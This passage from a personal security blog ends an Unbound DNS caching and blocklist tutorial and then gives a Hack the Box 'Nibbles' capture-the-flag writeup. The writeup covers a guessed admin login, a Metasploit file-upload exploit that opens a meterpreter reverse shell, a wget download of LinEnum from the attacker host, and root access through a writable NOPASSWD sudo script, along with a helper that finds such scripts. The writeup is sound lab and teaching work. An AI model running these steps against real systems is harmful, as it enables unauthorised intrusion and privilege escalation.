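SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# Title: sample hosts-format blocklist
127.0.0.1 localhost
0.0.0.0 0.0.0.0
0.0.0.0 ads.example.com          # inline comment
0.0.0.0 Tracker.Example.net evil.example.org
0.0.0.0 ads.example.com
EOF
hosts_to_unbound "$SAMPLE"
rm -f "$SAMPLE"
```

<p>Write the output to the block file referenced by the <strong>include:</strong> directive, run <strong>unbound-checkconf</strong>, then <strong>unbound-control reload</strong>; a cron entry that downloads the list with curl and pipes it through this function is the daily update mentioned above. The redirect is what makes a blocked site land on the Apache block page set up at the end of this post. Note that this only works cleanly for plain HTTP: for an HTTPS site the browser will show a certificate error before the block page, because the block page host does not hold that site's certificate.</p>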
<h2 id="dns-cache-setup">DNS CACHE SETUP</h2>
<p><strong>Test DNS Cache Locally</strong></p>
<p>Now it's time to check our DNS cache by doing a 'drill' (query) for the 'india.com' domain against our server. The first 'drill' has to go upstream and takes some milliseconds; run it a second time and compare the Query time of the two runs.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">drill india.com @192.168.0.50
</span></code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-10.png"><img src="/images/unbound-dns/unbound-10.png" /></a></p>
<p>As you can see in the above output, the first query took almost 262 ms to resolve, while the second took 0 ms.
The first answer was stored in our DNS cache, so the second 'drill' was served from the local cache (until the record's TTL expires) instead of going upstream; this is how a local caching resolver improves the loading speed of websites.</p>
<h2 id="flush-iptables-and-add-firewalld-rules">Flush Iptables and Add Firewalld Rules</h2>
<p>Managing rules with both iptables and firewalld on the same machine leads to conflicts, since firewalld maintains its own rule set, so it is a good idea to remove the existing iptables rules. To flush the iptables rules, use the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>iptables <span class="nt">-F</span>
</code></pre></div></div>
<p>Note that <strong>iptables -F</strong> only flushes the currently loaded rules and does not touch any saved rule set. Next, allow the DNS service in firewalld, both in the running configuration and permanently.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--add-service</span><span class="o">=</span>dns
<span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--add-service</span><span class="o">=</span>dns <span class="nt">--permanent</span>
</code></pre></div></div>
<p>After adding DNS service rules, list the rules and confirm.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>firewall-cmd <span class="nt">--list-all</span>
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-11.png"><img src="/images/unbound-dns/unbound-11.png" /></a></p>
<h2 id="managing-and-troubleshooting-unbound">Managing and Troubleshooting Unbound</h2>
<p>To get the current server status, use the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control status
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-12.png"><img src="/images/unbound-dns/unbound-12.png" /></a></p>
<h2 id="flushing-dns-records">Flushing DNS Records</h2>
<p>To see which name servers (the configured forwarders, in our setup) Unbound would use to resolve a specific name, use the command given below.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control lookup google.com
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-13.png"><img src="/images/unbound-dns/unbound-13.png" /></a></p>
<p>If our cache server keeps returning a stale or wrong answer for a name, we can use the flush command to remove its cached A, AAAA, NS, SOA, CNAME, MX, PTR and other records. <strong>flush_zone</strong> removes everything cached under a zone, including all of its subdomains.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control flush www.google.com
<span class="gp">#</span><span class="w"> </span>unbound-control flush_zone bing.com
</code></pre></div></div>
<p>To check which forwarders are currently used to resolve queries.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control list_forwards
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-14.png"><img src="/images/unbound-dns/unbound-14.png" /></a></p>
<p>Now restart the network service so that the new resolver setting takes effect, using the following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>/etc/init.d/network restart
</code></pre></div></div>
<h2 id="setting-up-apache-server-to-serve-the-block-page">Setting Up Apache Server to serve the Block Page</h2>
<p>Let's make a log directory for our block page site</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">mkdir</span> <span class="nt">-p</span> /var/log/httpd/blocking.com
</code></pre></div></div>
<p>In /etc/httpd/conf/httpd.conf, uncomment the <strong>ErrorDocument 404</strong> line and point it at /index.php (or wherever your block page lives), so that any request arriving at this server for a blocked site is answered with our custom page</p>
<p><a href="/images/unbound-dns/unbound-15.png"><img src="/images/unbound-dns/unbound-15.png" /></a></p>
<p>Now make the necessary changes to the block page itself and restart the Apache server</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>systemctl restart httpd.service
</code></pre></div></div>
<p>Finally, start the Unbound DNS server and browse to any website included in the block list: instead of the site we are greeted with this <strong>Block Page</strong></p>
<p><a href="/images/unbound-dns/unbound-16.png"><img src="/images/unbound-dns/unbound-16.png" /></a></p>
Steffin Stanly: Today we will learn how to create our own recursive DNS server using Unbound. This will improve performance through caching. We will also look at blocking unwanted pages.
Hack the Box: Nibbles Writeup 2018-06-06T00:00:00+00:00 2018-06-06T00:00:00+00:00 https://steffinstanly.github.io/Hack-the-Box-Nibbles
<p>Today let's look at the Hack the Box machine <strong>Nibbles</strong></p>
<p><a href="/images/nibbles/nibbles.png"><img src="/images/nibbles/nibbles.png" /></a></p>
<p>So let’s start with a TCP SYN scan for service discovery using Nmap to identify open ports and network services on the target machine.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>nmap <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-sV</span> <span class="nt">-T4</span> 10.10.10.75
<span class="go">Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-15 23:14 +08
Nmap scan report for 10.10.10.75
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
</span><span class="gp">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1
</span></code></pre></div></div>
<p>Ports 80 and 22 are open on the target machine</p>
<p>Since port 80 is open, let's run dirb against the target to identify interesting directories or pages.
gobuster can also be used to brute-force and identify interesting directories or pages.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>dirb http://10.10.10.75
<span class="go">-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 25 23:18:52 2018
URL_BASE: http://10.10.10.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.75/ ----
+ http://10.10.10.75/index.html (CODE:200|SIZE:93)
+ http://10.10.10.75/server-status (CODE:403|SIZE:299)
</span></code></pre></div></div>
<p>There is nothing of much use in the enumeration results.</p>
<p>Now let's enumerate the website manually</p>
<p><a href="/images/Nibbles website 1.png"><img src="/images/nibbles/Nibbles website 1.png" /></a></p>
<p>Checking the page source, we find a directory name</p>
<p><a href="/images/Nibbles website 2.png"><img src="/images/nibbles/Nibbles website 2.png" /></a></p>
<p>Browsing to 10.10.10.75/nibbleblog we get the blog home page</p>
<p><a href="/images/Nibbles website 3.png"><img src="/images/nibbles/Nibbles website 3.png" /></a></p>
<p>Now let's run dirb again, this time against /nibbleblog, to find any interesting directories</p>
<p>Here we find the /nibbleblog/admin.php page
<a href="/images/Nibbles website 4.png"><img src="/images/nibbles/Nibbles website 4.png" /></a></p>
<p>Now let's try to log in manually; by guessing I got the <strong>username</strong> as "<strong>admin</strong>" and the <strong>password</strong> as "<strong>nibbles</strong>"</p>
<p><a href="/images/Nibbles website 5.png"><img src="/images/nibbles/Nibbles website 5.png" /></a></p>
<p>Using searchsploit I could find an Arbitrary File Upload vulnerability for Nibbleblog</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>searchsploit nibbleblog
<span class="go">------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
Nibbleblog - Multiple SQL Injections | exploits/php/webapps/35865.txt
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</span></code></pre></div></div>
<p>Now let’s try to exploit this vulnerability using Metasploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf ></span><span class="w"> </span>search nibbleblog
<span class="go">
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Nibbleblog File Upload Vulnerability
</span></code></pre></div></div>
<p>Now let’s load the exploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf ></span><span class="w"> </span>use exploit/multi/http/nibbleblog_file_upload
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show options
<span class="go">
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>rhost 10.10.10.75
<span class="gp">rhost =></span><span class="w"> </span>10.10.10.75
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>username admin
<span class="gp">username =></span><span class="w"> </span>admin
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>password nibbles
<span class="gp">password =></span><span class="w"> </span>nibbles
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>targeturi /nibbleblog
<span class="gp">targeturi =></span><span class="w"> </span>/nibbleblog
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show payloads
<span class="go">
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via Perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6
php/bind_php normal PHP Command Shell, Bind TCP (via PHP)
php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
php/meterpreter/bind_tcp_ipv6 normal PHP Meterpreter, Bind TCP Stager IPv6
php/meterpreter/bind_tcp_ipv6_uuid normal PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid normal PHP Meterpreter, Bind TCP Stager with UUID Support
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP Stager
php/meterpreter/reverse_tcp_uuid normal PHP Meterpreter, PHP Reverse TCP Stager
php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
php/reverse_perl normal PHP Command, Double Reverse TCP Connection (via Perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via PHP)
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>payload php/meterpreter/reverse_tcp
<span class="gp">payload =></span><span class="w"> </span>php/meterpreter/reverse_tcp
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show options
<span class="go">
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.10.10.75 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>lhost 10.10.15.47
<span class="gp">lhost =></span><span class="w"> </span>10.10.15.47
<span class="go">
</span></code></pre></div></div>
<p>Now let’s run the exploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>exploit
<span class="go">
[*] Started reverse TCP handler on 10.10.15.47:4444
[*] Sending stage (37775 bytes) to 10.10.10.75
</span><span class="gp">[*] Meterpreter session 1 opened (10.10.15.47:4444 -></span><span class="w"> </span>10.10.10.75:59252<span class="o">)</span> at 2018-06-06 18:49:32 +0530
<span class="go">[+] Deleted image.php
</span><span class="gp">meterpreter ></span><span class="w">
</span><span class="go">
</span></code></pre></div></div>
<p>We now have a meterpreter session running as the user <strong>nibbler</strong>, as the shell prompt later on shows</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">cd </span>nibbler
<span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">ls</span>
<span class="go">Listing: /home/nibbler
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 0 fil 2017-12-29 16:00:07 +0530 .bash_history
40755/rwxr-xr-x 4096 dir 2018-06-06 18:53:00 +0530 .git
40775/rwxrwxr-x 4096 dir 2017-12-11 08:34:04 +0530 .nano
100644/rw-r--r-- 1363 fil 2018-06-06 18:51:34 +0530 README.md
100755/rwxr-xr-x 14392 fil 2018-06-06 18:47:25 +0530 dc
100644/rw-r--r-- 4963 fil 2018-06-06 18:46:47 +0530 dc.c
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:38 +0530 doc
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:52 +0530 lib
40755/rwxr-xr-x 4096 dir 2018-06-06 18:48:29 +0530 personal
100400/r-------- 1855 fil 2017-12-29 16:24:29 +0530 personal.zip
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:40 +0530 tools
100644/rw-r--r-- 3404 fil 2018-06-06 18:51:39 +0530 upc.sh
100400/r-------- 33 fil 2017-12-29 16:13:54 +0530 user.txt
</span><span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">
</span></code></pre></div></div>
<p>So we got the “<strong>user.txt</strong>”</p>
<p>Next, drop into a limited (non-TTY) shell from the meterpreter session</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">meterpreter ></span><span class="w"> </span>shell
<span class="go">Process 122906 created.
Channel 0 created.
ls
README.md
dc
dc.c
doc
files_cache.2177
lib
personal
personal.zip
privileged_cache.2177
tools
upc.sh
user.txt
</span></code></pre></div></div>
<p>Let's spawn a <strong>TTY shell</strong> here using the one-liner from the "<a href="https://netsec.ws/?p=337"><strong>Netsec list</strong></a>"</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">python3 -c 'import pty;</span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w">
</span><span class="go">
</span></code></pre></div></div>
<p>Next, we get <strong>LinEnum.sh</strong> onto the target machine. First I start PHP's built-in web server in the folder on my attacking machine that holds the script</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~/Desktop/PrivEscalation Enum#</span><span class="w"> </span>php <span class="nt">-S</span> 10.10.15.47:444
<span class="go">PHP 7.2.4-1 Development Server started at Wed Jun 6 18:59:11 2018
Listening on http://10.10.15.47:444
Document root is /root/Desktop/PrivEscalation Enum
Press Ctrl-C to quit.
[Wed Jun 6 19:00:04 2018] 10.10.10.75:35560 [200]: /LinEnum.sh
</span></code></pre></div></div>
<p>Then fetch the file on the target using wget</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span>wget http://10.10.15.47:444/LinEnum.sh <span class="nt">-O</span> /tmp/Linenum.sh
<span class="go">--2018-06-06 10:14:59-- http://10.10.15.47:444/LinEnum.sh
Connecting to 10.10.15.47:444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 42150 (41K) [application/x-sh]
Saving to: '/tmp/Linenum.sh'
</span><span class="gp">/tmp/Linenum.sh 100%[===================></span><span class="o">]</span> 41.16K 43.8KB/s <span class="k">in </span>0.9s
<span class="go">
</span></code></pre></div></div>
<p>So we have the file on the target machine; make it executable and run it</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/tmp$</span><span class="w"> </span><span class="nb">chmod </span>777 Linenum.sh
<span class="gp">nibbler@Nibbles:/tmp$</span><span class="w"> </span>sh ./Linenum.sh
</code></pre></div></div>
<p>Running LinEnum gives us the following interesting sudo entry</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
</span></code></pre></div></div>
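<p>LinEnum flagged that entry; as an added example (not part of the original writeup), the following POSIX shell function does the same check generically. It parses saved <strong>sudo -l</strong> output for NOPASSWD entries and reports which targets the current user can replace, either because the file itself is writable or because its parent directory is (a writable directory lets you move the original aside and drop in a replacement). The sudo output embedded in the script is constructed to mirror this box and the paths are assumptions.</p>

```shell
#!/bin/sh
# Added example, not part of the original writeup: find NOPASSWD sudo targets
# that the current user can replace, which is exactly the monitor.sh condition.
set -eu

# writable_nopasswd_targets <file-containing-"sudo -l"-output>
# Prints "<path> <reason>" for each exploitable entry; prints nothing otherwise.
# Entries carrying other tags before NOPASSWD (e.g. SETENV:) are not parsed.
writable_nopasswd_targets() {
    # Keep only the command part of lines such as
    #   (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh, /usr/bin/vim /etc/hosts
    # then split the comma-separated commands and drop any arguments.
    sed -n 's/^[[:space:]]*(.*)[[:space:]]*NOPASSWD:[[:space:]]*//p' "$1" |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//; s/[[:space:]].*$//' |
    while IFS= read -r cmd; do
        [ -n "$cmd" ] || continue
        case "$cmd" in
            ALL)
                printf '%s %s\n' "$cmd" "unrestricted-sudo" ;;
            /*)
                if [ -w "$cmd" ]; then
                    printf '%s %s\n' "$cmd" "file-writable"
                elif [ -w "$(dirname "$cmd")" ]; then
                    # Not writable itself, but we can move it aside and plant our own.
                    printf '%s %s\n' "$cmd" "dir-writable"
                fi ;;
            *)
                ;;   # negated (!cmd) or relative entries: ignore
        esac
    done
}

# Constructed demo: a fake "sudo -l" capture pointing at a script in a temp dir.
DEMO=$(mktemp -d)
printf '#!/bin/sh\necho monitoring\n' > "$DEMO/monitor.sh"
chmod 755 "$DEMO/monitor.sh"
cat > "$DEMO/sudo-l.txt" <<EOF
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: $DEMO/monitor.sh, /nonexistent/bin/prog
EOF
writable_nopasswd_targets "$DEMO/sudo-l.txt"
rm -rf "$DEMO"
```

<p>On the real box, <strong>sudo -l > /tmp/sudo-l.txt</strong> followed by this function reports the monitor.sh entry as file-writable, the same finding LinEnum produced. The check is worth running after every foothold: a NOPASSWD entry is only a problem when its target can be changed by the unprivileged user, and both conditions (writable file, writable parent directory) are easy to miss when reading <strong>sudo -l</strong> by eye.</p>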
<p>So let's cd into that folder and have a look</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">monitor.sh
</span></code></pre></div></div>
<p>The script runs as root through sudo without a password and is writable by nibbler, so we replace its contents with our own command and run it as root</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">echo</span> <span class="s2">"cat /root/root.txt"</span> <span class="o">></span> monitor.sh
<span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">cat </span>monitor.sh
<span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">cat</span> /root/root.txt
<span class="go">
</span><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">sudo</span> <span class="nt">-u</span> root ./monitor.sh
<span class="go">sudo: unable to resolve host Nibbles: Connection timed out
b6d745c0dfb6457c55591efc898ef88c
</span></code></pre></div></div>
<p>And that's done: we have the "<strong>root.txt</strong>" flag, read as root through the writable sudo script</p>
Steffin Stanly: Today let's look at the Hack the Box machine Nibbles